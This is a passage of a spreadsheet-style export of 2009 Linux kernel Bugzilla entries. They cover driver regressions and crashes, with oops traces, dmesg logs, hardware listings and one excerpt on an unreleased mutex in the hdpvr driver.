    <t>Subject : 2.6.31-rc5 regression: ath5k broken after suspend-to-ram Submitter : Johannes Stezenbach &lt;js@sig21.net&gt; Date : 2009-08-07 21:51 References : http://marc.info/?l=linux-kernel&amp;m=124968192727854&amp;w=4 Handled-By : Nick Kossifidis &lt;mickflemm@gmail.com&gt; Notify-Also : Bob Copeland &lt;me@bobcopeland.com&gt; Patch : http://patchwork.kernel.org/patch/38550/ This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops when USB Serial disconnected while in use</t>
  </si>
  <si>
    <t>2009-08-09 22:51 UTC</t>
  </si>
  <si>
    <t>2009-10-02 21:24 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc5 regression: Oops when USB Serial disconnected while in use Submitter : Bruno Prémont &lt;bonbons@linux-vserver.org&gt; Date : 2009-08-08 17:47 References : http://marc.info/?l=linux-kernel&amp;m=124975432900466&amp;w=4 Notify-Also : Alan Stern &lt;stern@rowland.harvard.edu&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>in function device_authorization mutex is not released on  error  path.</t>
  </si>
  <si>
    <t>2009-08-10 08:16 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:46 UTC</t>
  </si>
  <si>
    <t>In ./drivers/media/video/hdpvr/hdpvr-core.c in function device_authorization: If after mutex lock (line 4) usb_control_msg returns ret!=46 we go to label error. In this case before exit from function mutex must be unlocked. 01) static int device_authorization(struct hdpvr_device *dev) 02) { 03) ............ 04) mutex_lock(&amp;dev-&gt;usbc_mutex); 05) ret = usb_control_msg(dev-&gt;udev, 06) usb_rcvctrlpipe(dev-&gt;udev, 0), 07) rcv_request, 0x80 | request_type, 08) 0x0400, 0x0003, 09) dev-&gt;usbc_buf, 46,10000); 10) if (ret != 46) { 11) v4l2_err(&amp;dev-&gt;v4l2_dev, 12) "unexpected answer of status request, len %d\n", ret); 13) goto error; 14) } 15) ................. 16) error: 17) 18) return retval; 19) }</t>
  </si>
  <si>
    <t>Boot freeze due to b43 wireless driver</t>
  </si>
  <si>
    <t>Linux version 2.6.30-1-686 (Debian 2.6.30-4)</t>
  </si>
  <si>
    <t>2009-08-11 14:25 UTC</t>
  </si>
  <si>
    <t>Wenjia Bai</t>
  </si>
  <si>
    <t>2010-05-27 02:42 UTC</t>
  </si>
  <si>
    <t>The system freezes for about 90 seconds in boot. After disabling the b43 wireless driver, however, the problem disappears. So, I guess, it is probable that the b43 driver incurs the freeze. Detailed report is attached. Structure of Report 1. Problem description 2. Frequency 3. Laptop model 4. dmesg information with b43 5. dmesg information after disabling b43 6. Processor information 7. Module information with b43 8. Module information after disabling b43 9. Loaded driver and hardware information 10. PCI information</t>
  </si>
  <si>
    <t>Apple PowerMac11,2 and ATI Radeon X1900 PCIe: no frame buffer console</t>
  </si>
  <si>
    <t>PPC-64 Linux</t>
  </si>
  <si>
    <t>2009-08-12 20:15 UTC</t>
  </si>
  <si>
    <t>Andreas</t>
  </si>
  <si>
    <t>2012-06-13 14:49 UTC</t>
  </si>
  <si>
    <t>Created attachment 22692 [details] a real screen shot (I hope it isn't to big in file size) Hardware: Apple Power Mac G5 "Late 2005" (PowerMac11,2) Graphics card: ATI Radeon X1900 PCI-Express x16 (Mac Edition, 256MB VRAM) Distribution: Gentoo Linux Kernel: 2.6.30-gentoo-r4 (2.6.30.4) Kernel configuration: g5_defconfig Problem: The console stalls right after the handover from the early boot console (BootX and Open Firmware) to the frame buffer console. The kernel otherwise boots fine, only the display remains stalled. A similar bug can be fount at the debian-powerpc@lists.debian.org mailing list: http://www.mail-archive.com/debian-powerpc%40lists.debian.org/msg60934.html Maybe the last working kernel: 2.6.24-gentoo-r3 from the Gentoo Linux 2008.0 PPC LiveCD (I use this kernel now on my hard disk for booting) The relevant dmesg output for 2.6.24-gentoo-r3: Using unsupported 1680x1050 ATY,Prionace_A at 98008000, depth=8, pitch=1792 Console: switching to colour frame buffer device 210x65 fb0: Open Firmware frame buffer device on /pci@0,f0000000/ATY,PrionaceParent@0/ATY,Prionace_A@0 Using unsupported 640x480 ATY,Prionace_B at 9c008000, depth=8, pitch=768 fb1: Open Firmware frame buffer device on /pci@0,f0000000/ATY,PrionaceParent@0/ATY,Prionace_B@1 The relevant dmesg output for 2.6.27-gentoo-r8 and 2.6.30-gentoo-r4: Using unsupported 640x480 ATY,Prionace_B at 9c008000, depth=8, pitch=768 Console: switching to colour frame buffer device 80x30 fb0: Open Firmware frame buffer device on /pci@0,f0000000/ATY,PrionaceParent@0/ATY,Prionace_B@1 In the newer kernels the 1st frame buffer device, ATY,Prionace_A (OFDT?) is missing. If needed I could ssh into the kernel with the stalled display so get some more clues.</t>
  </si>
  <si>
    <t>Received NMI interrupt at resume</t>
  </si>
  <si>
    <t>2.6.31-rc6</t>
  </si>
  <si>
    <t>2009-08-15 07:55 UTC</t>
  </si>
  <si>
    <t>2009-12-29 21:01 UTC</t>
  </si>
  <si>
    <t>Kernel 2.6.31-rc2 through -rc6, 64bits mode Athlon X64 3GHz single core Bluewhite64 (64 bit native Slackware distro) Running on Acer Aspire 1511Lmi laptop I get the following at each resume from suspend to ram (echo -n mem &gt; /sys/power/state): Uhhuh. NMI received for unknown reason b0 on CPU 0. You have some hardware problem, likely on the PCI bus. Dazed and confused, but trying to continue I already reported this warning in http://bugzilla.kernel.org/show_bug.cgi?id=13781#c9 but this bug entry was for another resume problem and was since closed, so I'm opening this new one. This error was not present with 2.6.30 (also compiled with debug/kernel hacking options, and this log was already present in kernel/traps.c in this version, so I think this is a regression. Of course, I have no hardware problem I'm aware of. Moreover, except this warning, everything is working normally after the resume. Portion of the dmesg log below: Intel ICH 0000:00:06.0: PCI INT A -&gt; Link[LACI] -&gt; GSI 22 (level, low) -&gt; IRQ 22 Intel ICH 0000:00:06.0: setting latency timer to 64 Intel ICH Modem 0000:00:06.1: PCI INT B -&gt; Link[LMCI] -&gt; GSI 21 (level, low) -&gt; IRQ 21 Intel ICH Modem 0000:00:06.1: setting latency timer to 64 AMD_IDE 0000:00:08.0: setting latency timer to 64 amd74xx 0000:00:08.0: BIOS didn't set cable bits correctly. Enabling workaround. pci 0000:00:0a.0: setting latency timer to 64 b43-pci-bridge 0000:02:08.0: PCI INT A -&gt; Link[LNK4] -&gt; GSI 19 (level, low) -&gt; IRQ 19 firewire_core: skipped bus generations, destroying all nodes pci 0000:01:00.0: PME# disabled parport_pc 00:0b: activated hda: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hda: UDMA/100 mode selected hdc: host max PIO5 wanted PIO255(auto-tune) selected PIO4 hdc: UDMA/33 mode selected Uhhuh. NMI received for unknown reason b0 on CPU 0. You have some hardware problem, likely on the PCI bus. Dazed and confused, but trying to continue firewire_core: rediscovered device fw0 usb 2-3: reset full speed USB device using ohci_hcd and address 2 Restarting tasks ... done. powernow-k8: error - out of sync, fix 0x0 0xa, vid 0x12 0x2</t>
  </si>
  <si>
    <t>em28xx: Fatal exception in interrupt</t>
  </si>
  <si>
    <t>v2.6.31-rc6</t>
  </si>
  <si>
    <t>2009-08-16 14:09 UTC</t>
  </si>
  <si>
    <t>2012-06-13 14:53 UTC</t>
  </si>
  <si>
    <t>Created attachment 22745 [details] The first trace Pinnacle Hybrid Pro USB stick, Dell XPS m1330 I cannot pinpoint exactly how it happens, but it seems that hal (module probing?), pulseaudio server, and concurrent access to the audio device. I had sox running, to copy audio output of the tv-card to the laptop. Possibly also tvtime, which I used to activate the TV output. The tvtime program crashed on unrelated reasons but the point is: it was restarted often. I couldn't get the whole trace either, but there are some parts of the crash. Here is a little of transcript of it (for searching purposes), original images (.jpg) attached. The tree is modified, but none of the modification lie in the area and very unlikely to break anything (available on request). Pid: 0, comm: swapper Not tainted 2.6.31-rc6-t #132 XPS M1330 RIP: 0010:[&lt;ffffffffa00a231a&gt;] [&lt;ffffffffa00a231a&gt;] em28xx_audio_isocirq+x101/0x201 [em28xx_alsa] ... Call Trace: &lt;IRQ&gt; ? usb_hcd_unlink_urb_from_ep+0x18/0x43 usb_hcd_giveback_urb+0x84/0xbc ehci_urb_done+0xca/0xdf ehci_work+0x4ef/0x8ab ehci_irq+0x1aa/0x1dc usb_hcd_irq+0x38/0x94 handle_IRQ_event+0x54/0x12d handle_fasteoi_irq+0x8b/0xcb do_IRQ+0x5a/0xba ret_from_intr+0x0/0xf &lt;EOI&gt; ? tick_broadcast_oneshot_control+0x1a/0xfb ? acpi_idle_enter_bm+0x267/0x295 ? acpi_idle_enter_bm+0x25d/0x295 ? cpuidle_idle_call+0x8c/0xc7 ? cpu_idle+0x57/0x98 ? start_secondary+0x1a4/0x1a8 Code: ... ---[ end trace ... ]--- This one is from the previous crash, which scrolled away the part above: Kernel panic - not syncing: Fatal exception in interrupt Pid: 0, comm: swapper Tainted: G D 2.6.31-rc6-t #131 Call Traces: &lt;IRQ&gt; [&lt;...&gt;] panic+0xa0/0x155 ? up+0xf/0x39 ? _spin_unlock_irqrestore+0x38/0x47 ? release_console_sem+0x1ab/0x1e0 ? console_unblank oops_end no_context __bad_area_nosemaphore bad_area_nosemaphore do_page_fault page_fault ? em28xx_audio_isocirq+0x101/0x201 [em28xx_alsa] ? usb_hcd_unlink_urb_from_ep ... the rest is as in the above trace.</t>
  </si>
  <si>
    <t>prism 2.5 broke in 2.6.30.x</t>
  </si>
  <si>
    <t>2.6.30.x</t>
  </si>
  <si>
    <t>2009-08-17 21:10 UTC</t>
  </si>
  <si>
    <t>2009-12-18 15:46 UTC</t>
  </si>
  <si>
    <t>Prism 2.5 wireless card fails as an AP after a kernel upgrade to 2.6.30.1 and later (up to 2.6.30.5). Not tried with 2.6.30. Not tried as STA. The card works well up to kernel 2.6.29.6 To reproduce: # iwconfig wlan0 mode master # iwconfig wlan0 chan 4 # iwconfig wlan0 essid ea0 # ifconfig wlan0 192.168.220.254 &gt;now the STA associates&gt; # tcpdump -i wlan0 -n &lt;now the STA pings&gt; tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on wlan0, link-type EN10MB (Ethernet), capture size 96 bytes 23:59:36.177209 ARP, Request who-has 192.168.220.254 tell 192.168.220.88, length 28 23:59:36.177287 ARP, Request who-has 192.168.220.254 tell 192.168.220.88, length 28 23:59:36.177306 ARP, Reply 192.168.220.254 is-at 00:e0:00:8d:bd:8e, length 28 23:59:41.610114 ARP, Request who-has 192.168.220.254 tell 192.168.220.88, length 28 23:59:41.610192 ARP, Request who-has 192.168.220.254 tell 192.168.220.88, length 28 23:59:41.610199 ARP, Reply 192.168.220.254 is-at 00:e0:00:8d:bd:8e, length 28 &lt;packets (ARP, at least) flow from STA to AP, but not the other way round&gt; Related dmesg lines: [ 5.928208] hostap_pci 0000:02:01.0: PCI INT A -&gt; GSI 21 (level, low) -&gt; IRQ 21 [ 5.928781] hostap_pci: Registered netdevice wifi0 [ 5.928854] wifi0: Original COR value: 0x2 [ 6.128188] prism2_hw_init: initialized in 196 ms [ 6.129008] wifi0: NIC: id=0x8013 v1.0.0 [ 6.129225] wifi0: PRI: id=0x15 v1.1.1 [ 6.129437] wifi0: STA: id=0x1f v1.8.2 [ 6.133506] wifi0: Intersil Prism2.5 PCI: mem=0xec000000, irq=21 [ 6.134100] wifi0: registered netdevice wlan0 ..... (unrelated) ..... [ 575.222877] wifi0: deauthentication: 00:0b:6b:35:80:9a len=2, reason_code=3 [ 579.638087] wifi0: 00:0b:6b:35:80:9a auth_cb - alg=0 trans#=2 status=0 - STA authenticated [ 579.639151] wifi0: assoc from 00:0b:6b:35:80:9a with extra data (11 bytes) [&lt;dd&gt;&lt;09&gt;&lt;00&gt;&lt;03&gt;&lt;7f&gt;&lt;01&gt;&lt;01&gt;&lt;00&gt;&lt;00&gt;&lt;00&gt;&lt;00&gt;] [ 579.740704] wifi0: 00:0b:6b:35:80:9a assoc_cb - STA associated [ 583.017732] Virtual device wifi0 asks to queue packet! [ 588.025832] Virtual device wifi0 asks to queue packet! [ 596.028100] Virtual device wifi0 asks to queue packet! [ 814.920383] Virtual device wifi0 asks to queue packet! ... and so on OS: Debian Testing, GCC-4.3.3</t>
  </si>
  <si>
    <t>Can no longer read EEPROM of e1000e (makes card unusable)</t>
  </si>
  <si>
    <t>2009-08-18 15:01 UTC</t>
  </si>
  <si>
    <t>2012-06-13 15:22 UTC</t>
  </si>
  <si>
    <t>Hi, I have two onboard e1000e cards on my server. After upgrading from 2.6.31-rc1 to 2.6.31-rc6, the driver now says: [ 370.050934] e1000e: Intel(R) PRO/1000 Network Driver - 1.0.2-k2 [ 370.057013] e1000e: Copyright (c) 1999-2008 Intel Corporation. [ 370.063026] e1000e 0000:00:19.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 370.070244] 0000:00:19.0: 0000:00:19.0: Failed to initialize MSI interrupts. Falling back to legacy interrupts. [ 370.140342] 0000:00:19.0: 0000:00:19.0: The NVM Checksum Is Not Valid [ 370.167073] e1000e 0000:00:19.0: PCI INT A disabled [ 370.172103] e1000e: probe of 0000:00:19.0 failed with error -5 [ 370.178131] e1000e 0000:0d:00.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 370.185418] 0000:0d:00.0: 0000:0d:00.0: Failed to initialize MSI interrupts. Falling back to legacy interrupts. [ 370.312008] 0000:0d:00.0: eth0: (PCI Express:2.5GB/s:Width x1) 00:30:48:98:0f :8d [ 370.319759] 0000:0d:00.0: eth0: Intel(R) PRO/1000 Network Connection [ 370.326444] 0000:0d:00.0: eth0: MAC: 2, PHY: 2, PBA No: ffffff-0ff So the first card says "The NVM Checksum Is Not Valid" (and refuses to take it up), while the second works fine. (I thought for ages the card itself was defect, and tried to restore the EEPROM from a backup, but to no avail :-) ) git bisect says that the following patch is the culprit: commit 28c9195a570a32de2760310ca278d44a4fd060a4 Author: Bruce Allan &lt;bruce.w.allan@intel.com&gt; Date: Wed Jul 1 13:28:32 2009 +0000 e1000e: prevent NVM corruption on sectors larger than 4K Limit NVM writes to 4K sections to prevent NVM corruption on larger sector allocations (up to 64K). Signed-off-by: Bruce Allan &lt;bruce.w.allan@intel.com&gt; Signed-off-by: Jeff Kirsher &lt;jeffrey.t.kirsher@intel.com&gt; Signed-off-by: David S. Miller &lt;davem@davemloft.net&gt; :040000 040000 574ab3d502dd185a036fe3611fb09badb353775a 57dc4ea1884e024917110eae 644f0ed402a8312c M drivers FWIW: pannekake:/usr/src/linux-2.6# lspci -n | grep 19.0 00:19.0 0200: 8086:10bd (rev 02)</t>
  </si>
  <si>
    <t>gspca: Division by zero on exceeded bandwidth</t>
  </si>
  <si>
    <t>2009-08-18 16:41 UTC</t>
  </si>
  <si>
    <t>Hi, I catches the following Oops when starting my Microsoft VX-1000. I suppose the oops is related to the "not enough bandwidth" error. Thanks, Gregor Aug 7 20:52:27 Rincewind kernel: gspca: usb_submit_urb [0] err -28 Aug 7 20:52:31 Rincewind last message repeated 7 times Aug 7 20:52:31 Rincewind kernel: divide error: 0000 [#1] PREEMPT SMP Aug 7 20:52:31 Rincewind kernel: last sysfs file: /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-1/2-1.2/2-1.2:1.0/usb_endpoint/usbdev2.6_ep83/dev Aug 7 20:52:31 Rincewind kernel: CPU 0 Aug 7 20:52:31 Rincewind kernel: Modules linked in: nvidia(P) bridge stp llc bnep sco rfcomm l2cap bluetooth kvm_intel kvm fuse dm_crypt dm_mod loop cyberjack mt2266 usbserial snd_hda_codec_analog snd_em u10k1_synth snd_emux_synth snd_seq_virmidi snd_seq_midi_emul msp3400 tuner_simple tuner_types tuner snd_emu10k1 snd_ac97_codec ac97_bus snd_util_mem bttv ir_common snd_seq_dummy snd_usb_audio snd_hda_inte l snd_seq_oss snd_usb_lib i2c_algo_bit snd_hda_codec snd_seq_midi dvb_usb_dib0700 v4l2_common dib7000p videobuf_dma_sg snd_rawmidi dib7000m dvb_usb snd_hwdep dvb_core gspca_sonixj videobuf_core snd_seq_mi di_event snd_pcm_oss dib3000mc gspca_main btcx_risc snd_seq snd_mixer_oss evdev dibx000_common tveeprom dib0070 videodev r8169 snd_seq_device mii uhci_hcd i2c_core v4l2_compat_ioctl32 button thermal proce ssor snd_pcm snd_timer snd snd_page_alloc soundcore Aug 7 20:52:31 Rincewind kernel: Pid: 3390, comm: skype Tainted: P 2.6.30.1 #5 System Product Name Aug 7 20:52:31 Rincewind kernel: RIP: 0010:[&lt;ffffffffa00e01d2&gt;] [&lt;ffffffffa00e01d2&gt;] gspca_init_transfer+0x202/0x600 [gspca_main] Aug 7 20:52:31 Rincewind kernel: RSP: 0018:ffff880063335b48 EFLAGS: 00210246 Aug 7 20:52:31 Rincewind kernel: RAX: 0000000000008000 RBX: 0000000000000000 RCX: ffff88007fb90000 Aug 7 20:52:31 Rincewind kernel: RDX: 0000000000000000 RSI: 0000000000000003 RDI: 0000000000000000 Aug 7 20:52:31 Rincewind kernel: RBP: ffff880063335ba8 R08: ffff88007faad608 R09: 0000000000000000 Aug 7 20:52:31 Rincewind kernel: R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000000 Aug 7 20:52:31 Rincewind kernel: R13: 00000000ffffffe4 R14: ffff88007faf4e40 R15: 0000000000000020 Aug 7 20:52:31 Rincewind kernel: FS: 0000000000000000(0000) GS:ffff880001010000(0063) knlGS:00000000f6b11b90 Aug 7 20:52:31 Rincewind kernel: CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b Aug 7 20:52:31 Rincewind kernel: CR2: 000000000209ea40 CR3: 000000005628e000 CR4: 00000000000026e0 Aug 7 20:52:31 Rincewind kernel: DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 Aug 7 20:52:31 Rincewind kernel: DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Aug 7 20:52:31 Rincewind kernel: Process skype (pid: 3390, threadinfo ffff880063334000, task ffff880063036540) Aug 7 20:52:31 Rincewind kernel: Stack: Aug 7 20:52:31 Rincewind kernel: ffff880053664b18 0000000000001000 ffff88007f8ce000 ffff88007f8ce968 Aug 7 20:52:31 Rincewind kernel: 0000000300000003 ffff88007f8ce018 0000100063335b88 00000000fffffe00 Aug 7 20:52:31 Rincewind kernel: ffff88007f8ce000 ffff88007f8ce9a8 0000000040045612 ffff880063335c68 Aug 7 20:52:31 Rincewind kernel: Call Trace: Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffffa00e06c7&gt;] vidioc_streamon+0xb7/0xc0 [gspca_main] Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffffa009c052&gt;] video_ioctl2+0xd82/0x4370 [videodev] Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff8043986e&gt;] ? skb_dequeue+0x5e/0x80 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80270f00&gt;] ? rmqueue_bulk+0x90/0xb0 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80271653&gt;] ? get_page_from_freelist+0x373/0x5d0 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffffa009a1b1&gt;] v4l2_unlocked_ioctl+0x31/0x40 [videodev] Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffffa0065036&gt;] native_ioctl+0x36/0x90 [v4l2_compat_ioctl32] Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffffa00651dd&gt;] v4l2_compat_ioctl32+0x14d/0x17b4 [v4l2_compat_ioctl32] Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80271a93&gt;] ? __alloc_pages_internal+0xe3/0x4a0 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80274f10&gt;] ? lru_cache_add_lru+0x20/0x40 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff8028c195&gt;] ? page_add_new_anon_rmap+0x85/0x90 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80282c7e&gt;] ? handle_mm_fault+0x24e/0x740 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff802dc57f&gt;] compat_sys_ioctl+0x7f/0x3b0 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80225097&gt;] ? do_page_fault+0x177/0x280 Aug 7 20:52:31 Rincewind kernel: [&lt;ffffffff80229a04&gt;] sysenter_dispatch+0x7/0x2b Aug 7 20:52:31 Rincewind kernel: Code: ba 00 80 00 00 25 ff 07 00 00 41 c1 fc 0b 41 bf 20 00 00 00 41 83 e4 03 c7 45 c0 03 00 00 00 41 ff c4 44 0f af e0 89 d0 c1 fa 1f &lt;41&gt; f7 fc 83 f8 20 44 0f 4e f8 b8 03 00 00 00 44 89 fa 41 0f af Aug 7 20:52:31 Rincewind kernel: RIP [&lt;ffffffffa00e01d2&gt;] gspca_init_transfer+0x202/0x600 [gspca_main] Aug 7 20:52:31 Rincewind kernel: RSP &lt;ffff880063335b48&gt; Aug 7 20:52:31 Rincewind kernel: ---[ end trace 34c21a3a5e56a1cc ]---</t>
  </si>
  <si>
    <t>hd don't show up</t>
  </si>
  <si>
    <t>2009-08-19 22:19 UTC</t>
  </si>
  <si>
    <t>2009-10-26 19:19 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc5 regression: hd don't show up Submitter : Tim Blechmann &lt;tim@klingt.org&gt; Date : 2009-08-14 8:26 References : http://marc.info/?l=linux-kernel&amp;m=125023842514480&amp;w=4 Handled-By : Tejun Heo &lt;tj@kernel.org&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel bug at shut down</t>
  </si>
  <si>
    <t>2009-08-19 22:22 UTC</t>
  </si>
  <si>
    <t>2009-08-20 18:58 UTC</t>
  </si>
  <si>
    <t>Subject : kernel bug at shut down Submitter : Norbert Preining &lt;preining@logic.at&gt; Date : 2009-08-14 9:11 References : http://marc.info/?l=linux-kernel&amp;m=125024112418870&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>pty regressed again, breaking expect and gcc's testsuite</t>
  </si>
  <si>
    <t>2009-08-19 22:25 UTC</t>
  </si>
  <si>
    <t>2009-09-06 11:57 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.31-rc6: pty regressed again, breaking expect and gcc's testsuite Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2009-08-14 23:41 References : http://marc.info/?l=linux-kernel&amp;m=125029329805643&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mm/ipw2200 regression</t>
  </si>
  <si>
    <t>2009-08-19 22:29 UTC</t>
  </si>
  <si>
    <t>2009-09-06 20:07 UTC</t>
  </si>
  <si>
    <t>Subject : mm/ipw2200 regression (was: Re: linux-next: Tree for August 6) Submitter : Bartlomiej Zolnierkiewicz &lt;bzolnier@gmail.com&gt; Date : 2009-08-15 16:56 References : http://marc.info/?l=linux-kernel&amp;m=125036437221408&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel freezes, inotify problem</t>
  </si>
  <si>
    <t>2009-08-19 22:45 UTC</t>
  </si>
  <si>
    <t>2009-09-10 22:29 UTC</t>
  </si>
  <si>
    <t>Subject : kernel bug 2.6.31-rc6 (2) Submitter : Christoph Thielecke &lt;christoph.thielecke@gmx.de&gt; Date : 2009-08-19 12:48 References : http://marc.info/?l=linux-kernel&amp;m=125068616818353&amp;w=4 Handled-By : Eric Paris &lt;eparis@parisplace.org&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel NULL pointer dereference at 0000000000000008, pty-related</t>
  </si>
  <si>
    <t>2009-08-20 19:13 UTC</t>
  </si>
  <si>
    <t>2009-08-26 21:09 UTC</t>
  </si>
  <si>
    <t>Subject : Re: v2.6.31-rc6: BUG: unable to handle kernel NULL pointer dereference at 0000000000000008 Submitter : "Eric W. Biederman" &lt;ebiederm@xmission.com&gt; Date : 2009-08-20 5:46 References : http://marc.info/?l=linux-kernel&amp;m=125074724623423&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>dvb_usb_af9015: Oops on hotplugging</t>
  </si>
  <si>
    <t>2.6.31-rc5-git3</t>
  </si>
  <si>
    <t>2009-08-20 19:16 UTC</t>
  </si>
  <si>
    <t>2009-08-26 00:01 UTC</t>
  </si>
  <si>
    <t>Subject : dvb_usb_af9015: Oops on hotplugging with 2.6.31-rc5-git3 Submitter : "Stefan Lippers-Hollmann" &lt;s.L-H@gmx.de&gt; Date : 2009-08-05 20:32 References : http://marc.info/?l=linux-kernel&amp;m=124949716608828&amp;w=4 This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Module gspca_stv06xx image problem using Logitech Quickcam Express</t>
  </si>
  <si>
    <t>2.6.30-1-686-bigmem</t>
  </si>
  <si>
    <t>2009-08-21 22:26 UTC</t>
  </si>
  <si>
    <t>Alfred Egger</t>
  </si>
  <si>
    <t>2012-06-13 15:31 UTC</t>
  </si>
  <si>
    <t>-- System Information: Debian Release: squeeze/sid Package: linux-image-2.6.30-1-686-bigmem Version: 2.6.30-6 Severity: important Using a Logitech Quickcam Express using the gspca module only gives a broken image. lsusb output: Bus 003 Device 002: ID 046d</t>
  </si>
  <si>
    <t>e1000_clean_tx_irq: Detected Tx Unit Hang, more then 4 GB Memory</t>
  </si>
  <si>
    <t>2.6.31-rc5-amd64</t>
  </si>
  <si>
    <t>2009-08-24 07:31 UTC</t>
  </si>
  <si>
    <t>matthias.kreis</t>
  </si>
  <si>
    <t>2010-11-22 10:35 UTC</t>
  </si>
  <si>
    <t>Hello Mayby the following references helps: http://www.mail-archive.com/e1000-devel@lists.sourceforge.net/msg01152.html I still geht the following errors if I plug in a network cabel (You get the error only with more then 4GB memory): [ 224.836006] ADDRCONF(NETDEV_CHANGE): eth2: link becomes ready [ 226.805038] e1000: eth2: e1000_clean_tx_irq: Detected Tx Unit Hang [ 226.805043] Tx Queue &lt;0&gt; [ 226.805046] TDH &lt;4&gt; [ 226.805048] TDT &lt;4&gt; [ 226.805050] next_to_use &lt;4&gt; [ 226.805052] next_to_clean &lt;0&gt; [ 226.805054] buffer_info[next_to_clean] [ 226.805056] time_stamp &lt;ffffb69b&gt; [ 226.805058] next_to_watch &lt;0&gt; [ 226.805060] jiffies &lt;ffffb885&gt; [ 226.805062] next_to_watch.status &lt;0&gt; [ 228.804222] e1000: eth2: e1000_clean_tx_irq: Detected Tx Unit Hang [ 228.804227] Tx Queue &lt;0&gt; [ 228.804230] TDH &lt;4&gt; [ 228.804232] TDT &lt;4&gt; [ 228.804234] next_to_use &lt;4&gt; [ 228.804236] next_to_clean &lt;0&gt; [ 228.804238] buffer_info[next_to_clean] [ 228.804240] time_stamp &lt;ffffb69b&gt; [ 228.804242] next_to_watch &lt;0&gt; [ 228.804244] jiffies &lt;ffffba79&gt; [ 228.804247] next_to_watch.status &lt;0&gt; [ 229.080126] e1000: eth2 NIC Link is Down lspci: 00:00.0 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) 00:00.1 RAM memory: nVidia Corporation C51 Memory Controller 0 (rev a2) 00:00.2 RAM memory: nVidia Corporation C51 Memory Controller 1 (rev a2) 00:00.3 RAM memory: nVidia Corporation C51 Memory Controller 5 (rev a2) 00:00.4 RAM memory: nVidia Corporation C51 Memory Controller 4 (rev a2) 00:00.5 RAM memory: nVidia Corporation C51 Host Bridge (rev a2) 00:00.6 RAM memory: nVidia Corporation C51 Memory Controller 3 (rev a2) 00:00.7 RAM memory: nVidia Corporation C51 Memory Controller 2 (rev a2) 00:03.0 PCI bridge: nVidia Corporation C51 PCI Express Bridge (rev a1) 00:05.0 VGA compatible controller: nVidia Corporation C51PV [GeForce 6150] (rev a2) 00:09.0 RAM memory: nVidia Corporation MCP51 Host Bridge (rev a2) 00:0a.0 ISA bridge: nVidia Corporation MCP51 LPC Bridge (rev a3) 00:0a.1 SMBus: nVidia Corporation MCP51 SMBus (rev a3) 00:0a.2 RAM memory: nVidia Corporation MCP51 Memory Controller 0 (rev a3) 00:0b.0 USB Controller: nVidia Corporation MCP51 USB Controller (rev a3) 00:0b.1 USB Controller: nVidia Corporation MCP51 USB Controller (rev a3) 00:0d.0 IDE interface: nVidia Corporation MCP51 IDE (rev a1) 00:0e.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 00:0f.0 IDE interface: nVidia Corporation MCP51 Serial ATA Controller (rev a1) 00:10.0 PCI bridge: nVidia Corporation MCP51 PCI Bridge (rev a2) 00:10.1 Audio device: nVidia Corporation MCP51 High Definition Audio (rev a2) 00:14.0 Bridge: nVidia Corporation MCP51 Ethernet Controller (rev a3) 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control 01:00.0 Ethernet controller: Intel Corporation 82574L Gigabit Network Connection 02:05.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 02:08.0 Ethernet controller: Intel Corporation 82541PI Gigabit Ethernet Controller (rev 05) Memory Info: cat /proc/meminfo MemTotal: 6097292 kB 